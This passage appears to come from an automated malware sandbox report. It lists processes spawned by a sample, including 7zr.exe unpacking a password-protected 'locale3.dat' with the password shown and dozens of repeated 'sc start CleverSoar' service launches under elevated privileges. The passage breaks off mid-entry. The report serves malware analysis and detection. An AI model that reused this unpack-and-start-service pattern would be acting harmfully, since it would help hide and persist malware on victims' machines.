                                    Path:C:\Program Files (x86)\Windows NT\7zr.exe
                                    Wow64 process (32bit):true
                                    Commandline:7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs
                                    Imagebase:0x560000
                                    File size:831'200 bytes
                                    MD5 hash:84DC4B92D860E8AEA55D12B1E87EA108
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:moderate
                                    Has exited:true

                                    General

                                    Target ID:13
                                    Start time:22:31:02
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff66e660000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:14
                                    Start time:22:31:02
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                    Imagebase:0x7ff717f30000
                                    File size:496'640 bytes
                                    MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                    Has elevated privileges:true
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    General

                                    Target ID:15
                                    Start time:22:31:02
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:cmd /c start sc start CleverSoar
                                    Imagebase:0x7ff636db0000
                                    File size:289'792 bytes
                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:16
                                    Start time:22:31:02
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\sc.exe
                                    Wow64 process (32bit):false
                                    Commandline:sc start CleverSoar
                                    Imagebase:0x7ff7223c0000
                                    File size:72'192 bytes
                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:17
                                    Start time:22:31:02
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff66e660000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:18
                                    Start time:22:31:02
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:cmd /c start sc start CleverSoar
                                    Imagebase:0x7ff636db0000
                                    File size:289'792 bytes
                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:19
                                    Start time:22:31:02
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\sc.exe
                                    Wow64 process (32bit):false
                                    Commandline:sc start CleverSoar
                                    Imagebase:0x7ff7223c0000
                                    File size:72'192 bytes
                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:20
                                    Start time:22:31:02
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff66e660000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:21
                                    Start time:22:31:02
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:cmd /c start sc start CleverSoar
                                    Imagebase:0x7ff636db0000
                                    File size:289'792 bytes
                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:22
                                    Start time:22:31:02
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\sc.exe
                                    Wow64 process (32bit):false
                                    Commandline:sc start CleverSoar
                                    Imagebase:0x7ff7223c0000
                                    File size:72'192 bytes
                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:23
                                    Start time:22:31:02
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff66e660000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:24
                                    Start time:22:31:02
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:cmd /c start sc start CleverSoar
                                    Imagebase:0x7ff636db0000
                                    File size:289'792 bytes
                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:25
                                    Start time:22:31:02
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\sc.exe
                                    Wow64 process (32bit):false
                                    Commandline:sc start CleverSoar
                                    Imagebase:0x7ff7223c0000
                                    File size:72'192 bytes
                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:26
                                    Start time:22:31:03
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff66e660000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:27
                                    Start time:22:31:03
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:cmd /c start sc start CleverSoar
                                    Imagebase:0x7ff636db0000
                                    File size:289'792 bytes
                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:28
                                    Start time:22:31:03
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\sc.exe
                                    Wow64 process (32bit):false
                                    Commandline:sc start CleverSoar
                                    Imagebase:0x7ff7223c0000
                                    File size:72'192 bytes
                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:29
                                    Start time:22:31:03
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff66e660000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:30
                                    Start time:22:31:03
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:cmd /c start sc start CleverSoar
                                    Imagebase:0x7ff636db0000
                                    File size:289'792 bytes
                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:31
                                    Start time:22:31:03
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\sc.exe
                                    Wow64 process (32bit):false
                                    Commandline:sc start CleverSoar
                                    Imagebase:0x7ff7223c0000
                                    File size:72'192 bytes
                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:32
                                    Start time:22:31:03
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff66e660000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:33
                                    Start time:22:31:03
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:cmd /c start sc start CleverSoar
                                    Imagebase:0x7ff636db0000
                                    File size:289'792 bytes
                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:34
                                    Start time:22:31:03
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\sc.exe
                                    Wow64 process (32bit):false
                                    Commandline:sc start CleverSoar
                                    Imagebase:0x7ff7223c0000
                                    File size:72'192 bytes
                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:35
                                    Start time:22:31:03
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff66e660000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:36
                                    Start time:22:31:03
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:cmd /c start sc start CleverSoar
                                    Imagebase:0x7ff636db0000
                                    File size:289'792 bytes
                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:37
                                    Start time:22:31:03
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\sc.exe
                                    Wow64 process (32bit):false
                                    Commandline:sc start CleverSoar
                                    Imagebase:0x7ff7223c0000
                                    File size:72'192 bytes
                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:38
                                    Start time:22:31:03
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff66e660000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:39
                                    Start time:22:31:03
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:cmd /c start sc start CleverSoar
                                    Imagebase:0x7ff636db0000
                                    File size:289'792 bytes
                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:40
                                    Start time:22:31:03
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\sc.exe
                                    Wow64 process (32bit):false
                                    Commandline:sc start CleverSoar
                                    Imagebase:0x7ff7223c0000
                                    File size:72'192 bytes
                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:41
                                    Start time:22:31:03
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff66e660000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:42
                                    Start time:22:31:03
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:cmd /c start sc start CleverSoar
                                    Imagebase:0x7ff636db0000
                                    File size:289'792 bytes
                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:43
                                    Start time:22:31:03
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\sc.exe
                                    Wow64 process (32bit):false
                                    Commandline:sc start CleverSoar
                                    Imagebase:0x7ff7223c0000
                                    File size:72'192 bytes
                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:44
                                    Start time:22:31:03
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff66e660000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:45
                                    Start time:22:31:04
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:cmd /c start sc start CleverSoar
                                    Imagebase:0x7ff636db0000
                                    File size:289'792 bytes
                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:46
                                    Start time:22:31:04
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\sc.exe
                                    Wow64 process (32bit):false
                                    Commandline:sc start CleverSoar
                                    Imagebase:0x7ff7223c0000
                                    File size:72'192 bytes
                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:47
                                    Start time:22:31:04
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff66e660000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:48
                                    Start time:22:31:04
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:cmd /c start sc start CleverSoar
                                    Imagebase:0x7ff636db0000
                                    File size:289'792 bytes
                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:49
                                    Start time:22:31:04
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\sc.exe
                                    Wow64 process (32bit):false
                                    Commandline:sc start CleverSoar
                                    Imagebase:0x7ff7223c0000
                                    File size:72'192 bytes
                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:50
                                    Start time:22:31:04
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff66e660000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:51
                                    Start time:22:31:04
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:cmd /c start sc start CleverSoar
                                    Imagebase:0x7ff636db0000
                                    File size:289'792 bytes
                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:52
                                    Start time:22:31:04
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\sc.exe
                                    Wow64 process (32bit):false
                                    Commandline:sc start CleverSoar
                                    Imagebase:0x7ff7223c0000
                                    File size:72'192 bytes
                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:53
                                    Start time:22:31:04
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff66e660000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:54
                                    Start time:22:31:04
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:cmd /c start sc start CleverSoar
                                    Imagebase:0x7ff636db0000
                                    File size:289'792 bytes
                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:55
                                    Start time:22:31:04
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\sc.exe
                                    Wow64 process (32bit):false
                                    Commandline:sc start CleverSoar
                                    Imagebase:0x7ff7223c0000
                                    File size:72'192 bytes
                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:56
                                    Start time:22:31:04
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff66e660000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:57
                                    Start time:22:31:04
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:cmd /c start sc start CleverSoar
                                    Imagebase:0x7ff636db0000
                                    File size:289'792 bytes
                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:58
                                    Start time:22:31:04
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\sc.exe
                                    Wow64 process (32bit):false
                                    Commandline:sc start CleverSoar
                                    Imagebase:0x7ff7223c0000
                                    File size:72'192 bytes
                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:59
                                    Start time:22:31:04
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff66e660000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:60
                                    Start time:22:31:04
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:cmd /c start sc start CleverSoar
                                    Imagebase:0x7ff7403e0000
                                    File size:289'792 bytes
                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:61
                                    Start time:22:31:04
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\sc.exe
                                    Wow64 process (32bit):false
                                    Commandline:sc start CleverSoar
                                    Imagebase:0x7ff7223c0000
                                    File size:72'192 bytes
                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:62
                                    Start time:22:31:04
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff66e660000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:63
                                    Start time:22:31:04
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:cmd /c start sc start CleverSoar
                                    Imagebase:0x7ff636db0000
                                    File size:289'792 bytes
                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:64
                                    Start time:22:31:04
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\sc.exe
                                    Wow64 process (32bit):false
                                    Commandline:sc start CleverSoar
                                    Imagebase:0x7ff7223c0000
                                    File size:72'192 bytes
                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:65
                                    Start time:22:31:05
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff66e660000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:66
                                    Start time:22:31:05
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:cmd /c start sc start CleverSoar
                                    Imagebase:0x7ff636db0000
                                    File size:289'792 bytes
                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:67
                                    Start time:22:31:05
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\sc.exe
                                    Wow64 process (32bit):false
                                    Commandline:sc start CleverSoar
                                    Imagebase:0x7ff7223c0000
                                    File size:72'192 bytes
                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:68
                                    Start time:22:31:05
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff66e660000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:69
                                    Start time:22:31:05
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:cmd /c start sc start CleverSoar
                                    Imagebase:0x7ff636db0000
                                    File size:289'792 bytes
                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:70
                                    Start time:22:31:05
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\sc.exe
                                    Wow64 process (32bit):false
                                    Commandline:sc start CleverSoar
                                    Imagebase:0x7ff7223c0000
                                    File size:72'192 bytes
                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:71
                                    Start time:22:31:05
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff66e660000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:72
                                    Start time:22:31:05
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:cmd /c start sc start CleverSoar
                                    Imagebase:0x7ff636db0000
                                    File size:289'792 bytes
                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:73
                                    Start time:22:31:05
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\sc.exe
                                    Wow64 process (32bit):false
                                    Commandline:sc start CleverSoar
                                    Imagebase:0x7ff7223c0000
                                    File size:72'192 bytes
                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:74
                                    Start time:22:31:05
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff66e660000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:75
                                    Start time:22:31:05
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:cmd /c start sc start CleverSoar
                                    Imagebase:0x7ff636db0000
                                    File size:289'792 bytes
                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:76
                                    Start time:22:31:05
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\sc.exe
                                    Wow64 process (32bit):false
                                    Commandline:sc start CleverSoar
                                    Imagebase:0x7ff7223c0000
                                    File size:72'192 bytes
                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                    Has elevated privileges:true
                                    Has administrator privileges:true
